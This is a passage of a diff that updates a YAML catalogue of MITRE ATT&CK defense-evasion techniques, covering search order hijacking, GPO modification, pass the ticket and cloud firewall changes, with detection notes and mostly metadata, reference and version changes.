+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5694,16 +5833,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574.005:
     technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1562.006:
     technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.006
     atomic_tests: []
   T1562.007:
     technique:
-      modified: '2023-04-15T00:25:36.502Z'
+      modified: '2024-10-16T19:38:57.374Z'
       name: Disable or Modify Cloud Firewall
       description: "Adversaries may disable or modify a firewall within a cloud environment
         to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
         Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
         typically utilize restrictive security groups and firewall rules that only
         allow network activity from trusted IP addresses via expected ports and protocols.
-        An adversary may introduce new firewall rules or policies to allow access
-        into a victim cloud environment. For example, an adversary may use a script
-        or utility that creates new ingress rules in existing security groups to allow
-        any TCP/IP connectivity, or remove networking limitations to support traffic
-        associated with malicious activity (such as cryptomining).(Citation: Expel
-        IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
-        2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
-        lateral movement, and/or data exfiltration that would otherwise not be allowed."
+        An adversary with appropriate permissions may introduce new firewall rules
+        or policies to allow access into a victim cloud environment and/or move laterally
+        from the cloud control plane to the data plane. For example, an adversary
+        may use a script or utility that creates new ingress rules in existing security
+        groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+        to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+        Compute Credentials 2022) They may also remove networking limitations to support
+        traffic associated with malicious activity (such as cryptomining).(Citation:
+        Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+        Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+        C2 communications, lateral movement, and/or data exfiltration that would otherwise
+        not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+        or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
       - Expel
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor cloud logs for modification or creation of new security
         groups or firewall rules.
@@ -6879,7 +7002,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Firewall: Firewall Disable'
       - 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
         url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.002:
     technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
         description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
           - Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
           Retrieved April 22, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:01:59.733Z'
       name: Right-to-Left Override
       description: |-
         Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.002:
     technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:59:22.125Z'
       name: Indicator Removal on Host
       description: |-
         Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
       - Windows
       - Containers
       - Network
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Scheduled Job: Scheduled Job Modification'
       - 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
         external_id: T1070
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -7116,7 +7233,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
